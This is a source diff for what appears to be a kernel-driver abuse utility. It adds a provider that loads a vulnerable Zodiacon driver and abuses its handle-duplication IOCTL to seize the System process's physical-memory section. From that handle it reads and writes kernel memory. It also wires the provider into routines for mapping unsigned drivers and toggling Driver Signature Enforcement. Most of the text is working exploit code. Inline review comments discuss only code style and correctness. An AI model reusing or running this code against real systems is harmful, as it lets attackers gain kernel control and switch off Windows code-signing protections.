index ebee86a..a3ab4b1 100644
--- a/Source/Hamakaze/idrv/procexp.cpp
+++ b/Source/Hamakaze/idrv/procexp.cpp
@@ -4,9 +4,9 @@
*
* TITLE: PROCEXP.CPP
*
-* VERSION: 1.30
+* VERSION: 1.32
*
-* DATE: 20 Mar 2023
+* DATE: 10 Jun 2023
*
* Process Explorer driver routines.
*
@@ -36,40 +36,10 @@ static KDU_VICTIM_PROVIDER g_ProcExpVictimSelf{
sizeof(g_ProcExpSig) // Victim dispatch bytes size
};
-/*
-* PexpMapMemory
-*
-* Purpose:
-*
-* Map physical memory.
-*
-*/
-PVOID PexpMapMemory(
- _In_ ULONG_PTR PhysicalAddress,
- _In_ ULONG NumberOfBytes,
- _In_ BOOL MapForWrite
-)
-{
- return supMapPhysicalMemory(g_PexPhysicalMemorySection,
- PhysicalAddress,
- NumberOfBytes,
- MapForWrite);
-}
+#define PexpMapMemory(PhysicalAddress, NumberOfBytes, MapForWrite) \
+ supMapPhysicalMemory(g_PexPhysicalMemorySection, PhysicalAddress, NumberOfBytes, MapForWrite)
-/*
-* PexpUnmapMemory
-*
-* Purpose:
-*
-* Unmap physical memory.
-*
-*/
-VOID PexpUnmapMemory(
- _In_ PVOID BaseAddress
-)
-{
- supUnmapPhysicalMemory(BaseAddress);
-}
+#define PexpUnmapMemory(BaseAddress) supUnmapPhysicalMemory(BaseAddress)
/*
* PexpReadWritePhysicalMemory
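Review bot: The function-like macros that replace `PexpMapMemory` and `PexpUnmapMemory` drop the typed signatures and SAL annotations of the removed functions, and their parameters are expanded without parentheses. A `FORCEINLINE` wrapper keeps the call cost the same while preserving type checking, e.g. `FORCEINLINE PVOID PexpMapMemory(_In_ ULONG_PTR PhysicalAddress, _In_ ULONG NumberOfBytes, _In_ BOOL MapForWrite) { return supMapPhysicalMemory(g_PexPhysicalMemorySection, PhysicalAddress, NumberOfBytes, MapForWrite); }`. If the macros stay, wrap each parameter in parentheses in the expansion. The same applies to the `ZdcMapMemory`, `ZdcUnmapMemory` and `ZdcReadWritePhysicalMemory` macros added in zodiacon.cpp.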
diff --git a/Source/Hamakaze/idrv/zodiacon.cpp b/Source/Hamakaze/idrv/zodiacon.cpp
index 239763e..2d876ab 100644
--- a/Source/Hamakaze/idrv/zodiacon.cpp
+++ b/Source/Hamakaze/idrv/zodiacon.cpp
@@ -6,7 +6,7 @@
*
* VERSION: 1.32
*
-* DATE: 20 May 2022
+* DATE: 10 Jun 2022
*
* Zodiacon driver routines.
*
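Review bot: The updated header date reads `10 Jun 2022`, while zodiacon.h and the other file headers touched in this commit use `10 Jun 2023`. The year looks like a typo carried over from the old line, so the header should probably read `* DATE: 10 Jun 2023`.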
@@ -20,6 +20,8 @@
#include "global.h"
#include "idrv/zodiacon.h"
+HANDLE g_ZdcPhysicalMemorySection = NULL;
+
/*
* KObExpReadVirtualMemory
*
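Review bot: `g_ZdcPhysicalMemorySection` is defined with external linkage, but within this commit it is referenced only from zodiacon.cpp (the `Zdc*` macros, `ZdcRegisterDriver` and `ZdcUnregisterDriver`). Unless another translation unit declares it `extern`, `static HANDLE g_ZdcPhysicalMemorySection = NULL;` keeps it file-local and rules out a link-time clash with another provider's global.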
@@ -61,4 +63,528 @@ BOOL WINAPI KObExpWriteVirtualMemory(
sizeof(VirtualAddress),
Buffer,
NumberOfBytes);
-}
\ No newline at end of file
+}
+
+#define ZdcMapMemory(PhysicalAddress, NumberOfBytes, MapForWrite) \
+ supMapPhysicalMemory(g_ZdcPhysicalMemorySection, PhysicalAddress, NumberOfBytes, MapForWrite)
+
+#define ZdcUnmapMemory(BaseAddress) supUnmapPhysicalMemory(BaseAddress)
+
+#define ZdcReadWritePhysicalMemory(PhysicalAddress, Buffer, NumberOfBytes, DoWrite) \
+ supReadWritePhysicalMemory(g_ZdcPhysicalMemorySection, PhysicalAddress, Buffer, NumberOfBytes, DoWrite)
+
+/*
+* ZdcReadPhysicalMemory
+*
+* Purpose:
+*
+* Read from physical memory.
+*
+*/
+BOOL WINAPI ZdcReadPhysicalMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_ PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ UNREFERENCED_PARAMETER(DeviceHandle);
+
+ return ZdcReadWritePhysicalMemory(PhysicalAddress,
+ Buffer,
+ NumberOfBytes,
+ FALSE);
+}
+
+/*
+* ZdcWritePhysicalMemory
+*
+* Purpose:
+*
+* Write to physical memory.
+*
+*/
+BOOL WINAPI ZdcWritePhysicalMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ UNREFERENCED_PARAMETER(DeviceHandle);
+
+ return ZdcReadWritePhysicalMemory(PhysicalAddress,
+ Buffer,
+ NumberOfBytes,
+ TRUE);
+}
+
+/*
+* ZdcQueryPML4Value
+*
+* Purpose:
+*
+* Locate PML4.
+*
+*/
+BOOL WINAPI ZdcQueryPML4Value(
+ _In_ HANDLE DeviceHandle,
+ _Out_ ULONG_PTR* Value)
+{
+ ULONG_PTR pbLowStub1M = 0ULL, PML4 = 0;
+ ULONG cbRead = 0x100000;
+
+ UNREFERENCED_PARAMETER(DeviceHandle);
+
+ *Value = 0;
+
+ SetLastError(ERROR_SUCCESS);
+
+ pbLowStub1M = (ULONG_PTR)ZdcMapMemory(0ULL,
+ cbRead,
+ FALSE);
+
+ if (pbLowStub1M) {
+
+ PML4 = supGetPML4FromLowStub1M(pbLowStub1M);
+ if (PML4)
+ *Value = PML4;
+
+ ZdcUnmapMemory((PVOID)pbLowStub1M);
+
+ }
+
+ return (PML4 != 0);
+}
+
+/*
+* ZdcVirtualToPhysical
+*
+* Purpose:
+*
+* Translate virtual address to the physical.
+*
+*/
+BOOL WINAPI ZdcVirtualToPhysical(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _Out_ ULONG_PTR* PhysicalAddress)
+{
+ return PwVirtualToPhysical(DeviceHandle,
+ ZdcQueryPML4Value,
+ ZdcReadPhysicalMemory,
+ VirtualAddress,
+ PhysicalAddress);
+}
+
+/*
+* ZdcReadKernelVirtualMemory
+*
+* Purpose:
+*
+* Read virtual memory.
+*
+*/
+BOOL WINAPI ZdcReadKernelVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR Address,
+ _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ BOOL bResult;
+ ULONG_PTR physicalAddress = 0;
+
+ UNREFERENCED_PARAMETER(DeviceHandle);
+ SetLastError(ERROR_SUCCESS);
+
+ bResult = ZdcVirtualToPhysical(DeviceHandle,
+ Address,
+ &physicalAddress);
+
+ if (bResult) {
+
+ bResult = ZdcReadWritePhysicalMemory(physicalAddress,
+ Buffer,
+ NumberOfBytes,
+ FALSE);
+
+ }
+
+ return bResult;
+}
+
+/*
+* ZdcWriteKernelVirtualMemory
+*
+* Purpose:
+*
+* Write virtual memory.
+*
+*/
+BOOL WINAPI ZdcWriteKernelVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR Address,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes)
+{
+ BOOL bResult;
+ ULONG_PTR physicalAddress = 0;
+
+ UNREFERENCED_PARAMETER(DeviceHandle);
+ SetLastError(ERROR_SUCCESS);
+
+ bResult = ZdcVirtualToPhysical(DeviceHandle,
+ Address,
+ &physicalAddress);
+
+ if (bResult) {
+
+ bResult = ZdcReadWritePhysicalMemory(physicalAddress,
+ Buffer,
+ NumberOfBytes,
+ TRUE);
+
+ }
+
+ return bResult;
+}
+
+/*
+* ZdcpOpenDriver
+*
+* Purpose:
+*
+* Open Zodiacon drivers with their locking features in mind.
+*
+*/
+BOOL WINAPI ZdcpOpenDriver(
+ _In_ PVOID Param
+)
+{
+ BOOL bResult = FALSE;
+ PVOID ipcServer = NULL;
+ KDU_CONTEXT* Context = (PKDU_CONTEXT)Param;
+ DWORD cch;
+ ULONG resourceSize = 0;
+ WCHAR szTemp[MAX_PATH + 1], szFileName[MAX_PATH * 2];
+ LPWSTR lpCommand;
+ LPWSTR lpTargetName;
+
+ switch (Context->Provider->LoadData->ResourceId) {
+
+ case IDR_KREGEXP:
+ lpTargetName = (LPWSTR)ZODIACON_REGEXP_EXE;
+ lpCommand = (LPWSTR)L"1";
+ break;
+
+ case IDR_KOBJEXP:
+ default:
+ lpCommand = (LPWSTR)L"0";
+ lpTargetName = (LPWSTR)ZODIACON_SYSEXP_EXE;
+ break;
+ }
+
+ RtlSecureZeroMemory(&szTemp, sizeof(szTemp));
+ cch = supExpandEnvironmentStrings(L"%temp%", szTemp, MAX_PATH);
+ if (cch == 0 || cch > MAX_PATH) {
+ SetLastError(ERROR_NOT_ENOUGH_MEMORY);
+ return FALSE;
+ }
+
+ PBYTE dllBuffer;
+
+ dllBuffer = (PBYTE)KDULoadResource(IDR_TAIGEI64,
+ GetModuleHandle(NULL),
+ &resourceSize,
+ PROVIDER_RES_KEY,
+ TRUE);
+
+ if (dllBuffer == NULL) {
+
+ supPrintfEvent(kduEventError,
+ "[!] Failed to load helper dll\r\n");
+
+ return FALSE;
+
+ }
+
+ if (supReplaceDllEntryPoint(dllBuffer,
+ resourceSize,
+ (LPCSTR)"RegisterForProvider2",
+ TRUE))
+ {
+ StringCchPrintf(szFileName, MAX_PATH * 2,
+ TEXT("%ws\\%ws"),
+ szTemp,
+ lpTargetName);
+
+ NTSTATUS ntStatus;
+
+ if (supWriteBufferToFile(szFileName,
+ dllBuffer,
+ resourceSize,
+ TRUE,
+ FALSE,
+ &ntStatus))
+ {
+
+ STARTUPINFO si;
+ PROCESS_INFORMATION pi;
+
+ RtlSecureZeroMemory(&si, sizeof(si));
+ RtlSecureZeroMemory(&pi, sizeof(pi));
+
+ si.cb = sizeof(si);
+ GetStartupInfo(&si);
+
+ if (CreateProcess(szFileName,
+ lpCommand,
+ NULL,
+ NULL,
+ TRUE,
+ CREATE_SUSPENDED,
+ NULL,
+ szTemp,
+ &si,
+ &pi))
+ {
+
+ ipcServer = IpcStartApiServer(supIpcDuplicateHandleCallback,
+ supIpcOnException,
+ NULL,
+ NULL,
+ (PVOID)Context);
+
+ ResumeThread(pi.hThread);
+ }
+
+ if (ipcServer) {
+ WaitForSingleObject(pi.hProcess, INFINITE);
+ }
+
+ CloseHandle(pi.hThread);
+ CloseHandle(pi.hProcess);
+ bResult = (Context->DeviceHandle != NULL);
+
+ }
+ else {
+ supShowHardError("[!] Failed to write help dll on disk", ntStatus);
+ }
+
+ }
+ else {
+ supPrintfEvent(kduEventError, "[!] Error while configuring helper dll\r\n");
+ }
+
+ supHeapFree(dllBuffer);
+
+ return bResult;
+}
+
+/*
+* ZdcDuplicateHandle2
+*
+* Purpose:
+*
+* Duplicate handle via Zodiacon driver request.
+*
+*/
+BOOL ZdcDuplicateHandle2(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE SourceProcessId,
+ _In_ HANDLE SourceProcessHandle,
+ _In_ HANDLE SourceHandle,
+ _Out_ PHANDLE TargetHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ ULONG HandleAttributes,
+ _In_ ULONG Options
+)
+{
+ KZODIACON_DUP_DATA_V2 request;
+
+ UNREFERENCED_PARAMETER(SourceProcessHandle);
+ UNREFERENCED_PARAMETER(HandleAttributes);
+ UNREFERENCED_PARAMETER(Options);
+
+ RtlSecureZeroMemory(&request, sizeof(request));
+ request.SourcePid = HandleToUlong(SourceProcessId);
+ request.Handle = SourceHandle;
+ request.AccessMask = DesiredAccess;
+ request.Flags = DUPLICATE_SAME_ACCESS;
+
+ *TargetHandle = NULL;
+
+ return supCallDriver(DeviceHandle,
+ IOCTL_KANYEXP_DUPLICATE_OBJECT,
+ &request,
+ sizeof(request),
+ TargetHandle,
+ sizeof(PVOID));
+}
+
+/*
+* ZdcDuplicateHandle
+*
+* Purpose:
+*
+* Duplicate handle via Zodiacon driver request.
+*
+*/
+BOOL ZdcDuplicateHandle(
+ _In_ HANDLE DeviceHandle,
+ _In_ HANDLE SourceProcessId,
+ _In_ HANDLE SourceProcessHandle,
+ _In_ HANDLE SourceHandle,
+ _Out_ PHANDLE TargetHandle,
+ _In_ ACCESS_MASK DesiredAccess,
+ _In_ ULONG HandleAttributes,
+ _In_ ULONG Options
+)
+{
+ KZODIACON_DUP_DATA request;
+
+ UNREFERENCED_PARAMETER(SourceProcessHandle);
+ UNREFERENCED_PARAMETER(HandleAttributes);
+ UNREFERENCED_PARAMETER(Options);
+
+ RtlSecureZeroMemory(&request, sizeof(request));
+ request.SourcePid = HandleToUlong(SourceProcessId);
+ request.Handle = HandleToUlong(SourceHandle);
+ request.AccessMask = DesiredAccess;
+ request.Flags = DUPLICATE_SAME_ACCESS;
+
+ *TargetHandle = NULL;
+
+ return supCallDriver(DeviceHandle,
+ IOCTL_KANYEXP_DUPLICATE_OBJECT,
+ &request,
+ sizeof(request),
+ TargetHandle,
+ sizeof(PVOID));
+}
+
+/*
+* ZdcRegisterDriver
+*
+* Purpose:
+*
+* Driver initialization routine.
+*
+*/
+BOOL WINAPI ZdcRegisterDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param)
+{
+ ULONG DriverId = PtrToUlong(Param);
+ pfnDuplicateHandleCallback callback;
+
+ //
+ // Workaround for Yosifovich bugs.
+ //
+
+ switch (DriverId) {
+ case IDR_KREGEXP:
+ callback = ZdcDuplicateHandle2;
+ break;
+ default:
+ callback = ZdcDuplicateHandle;
+ break;
+ }
+
+ return supOpenPhysicalMemory2(DeviceHandle,
+ callback,
+ &g_ZdcPhysicalMemorySection);
+}
+
+/*
+* ZdcUnregisterDriver
+*
+* Purpose:
+*
+* Free driver related resources.
+*
+*/
+BOOL WINAPI ZdcUnregisterDriver(
+ _In_ HANDLE DeviceHandle)
+{
+ UNREFERENCED_PARAMETER(DeviceHandle);
+
+ if (g_ZdcPhysicalMemorySection) {
+ NtClose(g_ZdcPhysicalMemorySection);
+ g_ZdcPhysicalMemorySection = NULL;
+ }
+
+ return TRUE;
+}
+
+/*
+* ZdcStartVulnerableDriver
+*
+* Purpose:
+*
+* Load/open vulnerable driver callback.
+*
+*/
+BOOL ZdcStartVulnerableDriver(
+ _In_ KDU_CONTEXT* Context
+)
+{
+ BOOL bLoaded = FALSE;
+ NTSTATUS ntStatus;
+ KDU_DB_ENTRY* provLoadData = Context->Provider->LoadData;
+ LPWSTR lpDeviceName = provLoadData->DeviceName;
+ LPWSTR lpDriverName = provLoadData->DriverName;
+ LPWSTR lpFullFileName = Context->DriverFileName;
+
+ //
+ // Check if driver already loaded.
+ //
+ if (supIsObjectExists((LPWSTR)L"\\Device", lpDeviceName)) {
+
+ supPrintfEvent(kduEventError,
+ "[!] Vulnerable driver is already loaded\r\n");
+
+ bLoaded = TRUE;
+ }
+ else {
+
+ //
+ // Driver is not loaded, load it.
+ //
+ if (!KDUProvExtractVulnerableDriver(Context))
+ return FALSE;
+
+ ntStatus = supLoadDriverEx(lpDriverName,
+ lpFullFileName,
+ FALSE,
+ NULL,
+ NULL);
+
+ if (NT_SUCCESS(ntStatus)) {
+
+ supPrintfEvent(kduEventInformation,
+ "[+] Vulnerable driver \"%ws\" loaded\r\n", lpDriverName);
+
+ bLoaded = TRUE;
+ }
+ else {
+ supShowHardError("[!] Unable to load vulnerable driver", ntStatus);
+ DeleteFile(lpFullFileName);
+ }
+
+ }
+
+ if (bLoaded) {
+
+ printf_s("[+] Acquiring handle for driver device \"%ws\" -> please wait, this can take a few seconds\r\n",
+ provLoadData->DeviceName);
+
+ if (ZdcpOpenDriver(Context)) {
+
+ supPrintfEvent(kduEventInformation,
+ "[+] Successfully acquired handle for driver device \"%ws\"\r\n",
+ provLoadData->DeviceName);
+
+ }
+ }
+
+ return (Context->DeviceHandle != NULL);
+}
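Review bot: In `ZdcpOpenDriver`, `lpCommand` points at a string literal (`(LPWSTR)L"1"` or `(LPWSTR)L"0"`) and is passed as the command-line argument of `CreateProcess`; the wide-character version of that API is documented as able to modify this buffer, so it must not be read-only memory. Copy the value into a writable local first, e.g. `WCHAR szCommand[2] = { lpCommand[0], 0 };`, and pass `szCommand`. Separately, a failed `CreateProcess` is not reported, and both `CloseHandle` calls still run on the zeroed `pi` handles, which overwrites the last-error value. Moving the wait and the two `CloseHandle` calls into the success branch and adding a `supPrintfEvent(kduEventError, ...)` line on the failure path would make the failure visible. The return value of `StringCchPrintf` is also unchecked, and the message `"[!] Failed to write help dll on disk"` presumably means "helper dll".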
diff --git a/Source/Hamakaze/idrv/zodiacon.h b/Source/Hamakaze/idrv/zodiacon.h
index 3f8c7eb..96f96dc 100644
--- a/Source/Hamakaze/idrv/zodiacon.h
+++ b/Source/Hamakaze/idrv/zodiacon.h
@@ -6,9 +6,9 @@
*
* VERSION: 1.32
*
-* DATE: 20 May 2023
+* DATE: 10 Jun 2023
*
-* Zodiacon driver interface header.
+* Zodiacon drivers interface header.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@@ -19,12 +19,38 @@
#pragma once
+#define ZODIACON_DEVICE (DWORD)0x8000
+
+#define ZODIACON_DUP_HANDLE (DWORD)0x801
+
+#define IOCTL_KANYEXP_DUPLICATE_OBJECT \
+ CTL_CODE(ZODIACON_DEVICE, ZODIACON_DUP_HANDLE, METHOD_BUFFERED, FILE_ANY_ACCESS)
+
#define IOCTL_KOBEXP_READ_VMEM \
CTL_CODE(FILE_DEVICE_UNKNOWN, 0x901, METHOD_OUT_DIRECT, FILE_READ_ACCESS)
#define IOCTL_KOBEXP_WRITE_VMEM \
CTL_CODE(FILE_DEVICE_UNKNOWN, 0x902, METHOD_IN_DIRECT, FILE_WRITE_ACCESS)
+typedef struct _KZODIACON_DUP_DATA {
+ ULONG Handle;
+ ULONG SourcePid;
+ ULONG AccessMask;
+ ULONG Flags;
+} KZODIACON_DUP_DATA, *PKZODIACON_DUP_DATA;
+
+//
+// Yep, screwed up with previously compiled drivers.
+//
+
+typedef struct _KZODIACON_DUP_DATA_V2 {
+ HANDLE Handle;
+ ULONG SourcePid;
+ ULONG AccessMask;
+ ULONG Flags;
+} KZODIACON_DUP_DATA_V2, *PKZODIACON_DUP_DATA_V2;
+
+
BOOL WINAPI KObExpReadVirtualMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR VirtualAddress,
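Review bot: The comment `Yep, screwed up with previously compiled drivers.` between `KZODIACON_DUP_DATA` and `KZODIACON_DUP_DATA_V2` does not say which driver build expects which layout. The two structs differ only in the first field (`ULONG Handle` versus pointer-sized `HANDLE Handle`), so picking the wrong one changes both the offsets and the buffer size passed with `IOCTL_KANYEXP_DUPLICATE_OBJECT`. I would replace the remark with a comment naming the consumer of each layout and pin the 32-bit one with `C_ASSERT(sizeof(KZODIACON_DUP_DATA) == 16);`, so that a packing change fails at compile time.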
@@ -36,3 +62,46 @@ BOOL WINAPI KObExpWriteVirtualMemory(
_In_ ULONG_PTR VirtualAddress,
_In_reads_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes);
+
+BOOL WINAPI ZdcWriteKernelVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR Address,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+BOOL WINAPI ZdcReadKernelVirtualMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR Address,
+ _Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+BOOL WINAPI ZdcVirtualToPhysical(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR VirtualAddress,
+ _Out_ ULONG_PTR* PhysicalAddress);
+
+BOOL WINAPI ZdcQueryPML4Value(
+ _In_ HANDLE DeviceHandle,
+ _Out_ ULONG_PTR* Value);
+
+BOOL WINAPI ZdcWritePhysicalMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_reads_bytes_(NumberOfBytes) PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+BOOL WINAPI ZdcReadPhysicalMemory(
+ _In_ HANDLE DeviceHandle,
+ _In_ ULONG_PTR PhysicalAddress,
+ _In_ PVOID Buffer,
+ _In_ ULONG NumberOfBytes);
+
+BOOL WINAPI ZdcRegisterDriver(
+ _In_ HANDLE DeviceHandle,
+ _In_opt_ PVOID Param);
+
+BOOL WINAPI ZdcUnregisterDriver(
+ _In_ HANDLE DeviceHandle);
+
+BOOL ZdcStartVulnerableDriver(
+ _In_ KDU_CONTEXT* Context);
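Review bot: `ZdcReadPhysicalMemory` annotates its destination as `_In_ PVOID Buffer`, while the parallel `ZdcReadKernelVirtualMemory` a few lines above uses `_Out_writes_bytes_(NumberOfBytes)` for the same role. With `_In_`, static analysis treats the buffer as an initialized input and will not check the caller's size against `NumberOfBytes`. The declaration should read `_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,`, with the definition in the .cpp file (not visible in this hunk) changed to match.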
diff --git a/Source/Hamakaze/kduplist.h b/Source/Hamakaze/kduplist.h
index fb9dff9..b5af61e 100644
--- a/Source/Hamakaze/kduplist.h
+++ b/Source/Hamakaze/kduplist.h
@@ -6,7 +6,7 @@
*
* VERSION: 1.32
*
-* DATE: 20 May 2023
+* DATE: 10 Jun 2023
*
* Providers global list.
*
@@ -970,6 +970,54 @@ static KDU_PROVIDER g_KDUProviders[] =
(provReadPhysicalMemory)NULL,
(provWritePhysicalMemory)NULL,
+ (provValidatePrerequisites)NULL
+ },
+
+ {
+ NULL,
+
+ (provStartVulnerableDriver)ZdcStartVulnerableDriver,
+ (provStopVulnerableDriver)KDUProvStopVulnerableDriver,
+
+ (provRegisterDriver)ZdcRegisterDriver,
+ (provUnregisterDriver)ZdcUnregisterDriver,
+ (provPreOpenDriver)NULL,
+ (provPostOpenDriver)NULL,
+ (provMapDriver)KDUMapDriver,
+ (provControlDSE)KDUControlDSE,
+
+ (provReadKernelVM)ZdcReadKernelVirtualMemory,
+ (provWriteKernelVM)ZdcWriteKernelVirtualMemory,
+
+ (provVirtualToPhysical)ZdcVirtualToPhysical,
+ (provQueryPML4)ZdcQueryPML4Value,
+ (provReadPhysicalMemory)ZdcReadPhysicalMemory,
+ (provWritePhysicalMemory)ZdcWritePhysicalMemory,
+
+ (provValidatePrerequisites)NULL
+ },
+
+ {
+ NULL,
+
+ (provStartVulnerableDriver)ZdcStartVulnerableDriver,
+ (provStopVulnerableDriver)KDUProvStopVulnerableDriver,
+
+ (provRegisterDriver)ZdcRegisterDriver,
+ (provUnregisterDriver)ZdcUnregisterDriver,
+ (provPreOpenDriver)NULL,
+ (provPostOpenDriver)NULL,
+ (provMapDriver)KDUMapDriver,
+ (provControlDSE)KDUControlDSE,
+
+ (provReadKernelVM)ZdcReadKernelVirtualMemory,
+ (provWriteKernelVM)ZdcWriteKernelVirtualMemory,
+
+ (provVirtualToPhysical)ZdcVirtualToPhysical,
+ (provQueryPML4)ZdcQueryPML4Value,
+ (provReadPhysicalMemory)ZdcReadPhysicalMemory,
+ (provWritePhysicalMemory)ZdcWritePhysicalMemory,
+
(provValidatePrerequisites)NULL
}
};
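Review bot: The two initializers added to `g_KDUProviders` are byte-identical and purely positional, so nothing in the table says which provider each one belongs to. The mapping presumably follows the `KDU_PROVIDER_KOBJEXP` (37) and `KDU_PROVIDER_KREGEXP` (38) constants added in Source/Shared/consts.h, but that is only an inference from ordering. A leading comment on each entry, for example `// KDU_PROVIDER_KOBJEXP` and `// KDU_PROVIDER_KREGEXP`, would make an insertion or reorder that shifts the indices visible in review. The array itself begins outside this hunk.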
diff --git a/Source/Hamakaze/res/SB_SMBUS_SDK.bin b/Source/Hamakaze/res/SB_SMBUS_SDK.bin
index 50448bd..8308b06 100644
Binary files a/Source/Hamakaze/res/SB_SMBUS_SDK.bin and b/Source/Hamakaze/res/SB_SMBUS_SDK.bin differ
diff --git a/Source/Hamakaze/res/Taigei32.bin b/Source/Hamakaze/res/Taigei32.bin
index a29a0e4..66aa218 100644
Binary files a/Source/Hamakaze/res/Taigei32.bin and b/Source/Hamakaze/res/Taigei32.bin differ
diff --git a/Source/Hamakaze/sup.cpp b/Source/Hamakaze/sup.cpp
index 68c1754..7927c4b 100644
--- a/Source/Hamakaze/sup.cpp
+++ b/Source/Hamakaze/sup.cpp
@@ -4,9 +4,9 @@
*
* TITLE: SUP.CPP
*
-* VERSION: 1.31
+* VERSION: 1.32
*
-* DATE: 14 Apr 2023
+* DATE: 10 Jun 2023
*
* Program global support routines.
*
@@ -314,6 +314,131 @@ BOOL WINAPI supReadWritePhysicalMemory(
return bResult;
}
+/*
+* supOpenPhysicalMemory2
+*
+* Purpose:
+*
+* Locate and open physical memory section for read/write.
+*
+*/
+BOOL WINAPI supOpenPhysicalMemory2(
+ _In_ HANDLE DeviceHandle,
+ _In_ pfnDuplicateHandleCallback DuplicateHandleCallback,
+ _Out_ PHANDLE PhysicalMemoryHandle)
+{
+ BOOL bResult = FALSE;
+ DWORD dwError = ERROR_NOT_FOUND;
+ ULONG sectionObjectType = (ULONG)-1;
+ HANDLE sectionHandle = NULL;
+ PSYSTEM_HANDLE_INFORMATION_EX handleArray = NULL;
+ UNICODE_STRING ustr;
+ OBJECT_ATTRIBUTES obja;
+ UNICODE_STRING usSection;
+
+ do {
+
+ *PhysicalMemoryHandle = NULL;
+
+ RtlInitUnicodeString(&ustr, L"\\KnownDlls\\kernel32.dll");
+ InitializeObjectAttributes(&obja, &ustr, OBJ_CASE_INSENSITIVE, NULL, NULL);
+
+ NTSTATUS ntStatus = NtOpenSection(§ionHandle, SECTION_QUERY, &obja);
+
+ if (!NT_SUCCESS(ntStatus)) {
+ dwError = RtlNtStatusToDosError(ntStatus);
+ break;
+ }
+
+ handleArray = (PSYSTEM_HANDLE_INFORMATION_EX)supGetSystemInfo(SystemExtendedHandleInformation);
+ if (handleArray == NULL) {
+ dwError = ERROR_NOT_ENOUGH_MEMORY;
+ break;
+ }
+
+ ULONG i;
+ DWORD currentProcessId = GetCurrentProcessId();
+
+ for (i = 0; i < handleArray->NumberOfHandles; i++) {
+ if (handleArray->Handles[i].UniqueProcessId == currentProcessId &&
+ handleArray->Handles[i].HandleValue == (ULONG_PTR)sectionHandle)
+ {
+ sectionObjectType = handleArray->Handles[i].ObjectTypeIndex;
+ break;
+ }
+ }
+
+ NtClose(sectionHandle);
+ sectionHandle = NULL;
+
+ if (sectionObjectType == (ULONG)-1) {
+ dwError = ERROR_INVALID_DATATYPE;
+ break;
+ }
+
+ RtlInitUnicodeString(&usSection, L"\\Device\\PhysicalMemory");
+
+ for (i = 0; i < handleArray->NumberOfHandles; i++) {
+ if (handleArray->Handles[i].UniqueProcessId == SYSTEM_PID_MAGIC &&
+ handleArray->Handles[i].ObjectTypeIndex == (ULONG_PTR)sectionObjectType &&
+ handleArray->Handles[i].GrantedAccess == SECTION_ALL_ACCESS)
+ {
+ HANDLE testHandle = NULL;
+
+ if (DuplicateHandleCallback(DeviceHandle,
+ UlongToHandle(SYSTEM_PID_MAGIC),
+ NULL,
+ (HANDLE)handleArray->Handles[i].HandleValue,
+ &testHandle,
+ MAXIMUM_ALLOWED,
+ 0,
+ 0))
+ {
+ union {
+ BYTE* Buffer;
+ POBJECT_NAME_INFORMATION Information;
+ } NameInfo;
+
+ NameInfo.Buffer = NULL;
+
+ ntStatus = supQueryObjectInformation(testHandle,
+ ObjectNameInformation,
+ (PVOID*)&NameInfo.Buffer,
+ NULL,
+ (PNTSUPMEMALLOC)supHeapAlloc,
+ (PNTSUPMEMFREE)supHeapFree);
+
+ if (NT_SUCCESS(ntStatus) && NameInfo.Buffer) {
+
+ if (RtlEqualUnicodeString(&usSection, &NameInfo.Information->Name, TRUE)) {
+ *PhysicalMemoryHandle = testHandle;
+ bResult = TRUE;
+ }
+
+ supHeapFree(NameInfo.Buffer);
+ }
+
+ if (bResult == FALSE)
+ NtClose(testHandle);
+ }
+
+ if (bResult)
+ break;
+
+ }
+ }
+
+ } while (FALSE);
+
+ if (sectionHandle) NtClose(sectionHandle);
+ if (handleArray) supHeapFree(handleArray);
+
+ if (bResult) dwError = ERROR_SUCCESS;
+
+ SetLastError(dwError);
+ return bResult;
+}
+
/*
* supOpenPhysicalMemory
*
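Review bot: The header comment on `supOpenPhysicalMemory2` ("Locate and open physical memory section for read/write") leaves out the contract the body implements. On success the duplicated handle is handed to the caller through `PhysicalMemoryHandle` and the caller has to close it. The outcome is also reported through `SetLastError`: `ERROR_NOT_FOUND` when no candidate matches, `ERROR_INVALID_DATATYPE` when the type-index lookup fails, `ERROR_NOT_ENOUGH_MEMORY` when the handle snapshot cannot be obtained. I would add a short Return/Remarks paragraph stating that, and note that `DuplicateHandleCallback` is invoked without a NULL check, so `_In_` is the only thing enforcing it.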
@@ -3355,3 +3480,99 @@ VOID supShowWin32Error(
Win32Error);
}
}
+
+/*
+* supIpcOnException
+*
+* Purpose:
+*
+* ALPC receive exception callback.
+*
+*/
+VOID CALLBACK supIpcOnException(
+ _In_ ULONG ExceptionCode,
+ _In_opt_ PVOID UserContext
+)
+{
+ UNREFERENCED_PARAMETER(UserContext);
+
+ supPrintfEvent(kduEventError,
+ "[!] Exception 0x%lx thrown during IPC callback\r\n", ExceptionCode);
+}
+
+/*
+* supIpcDuplicateHandleCallback
+*
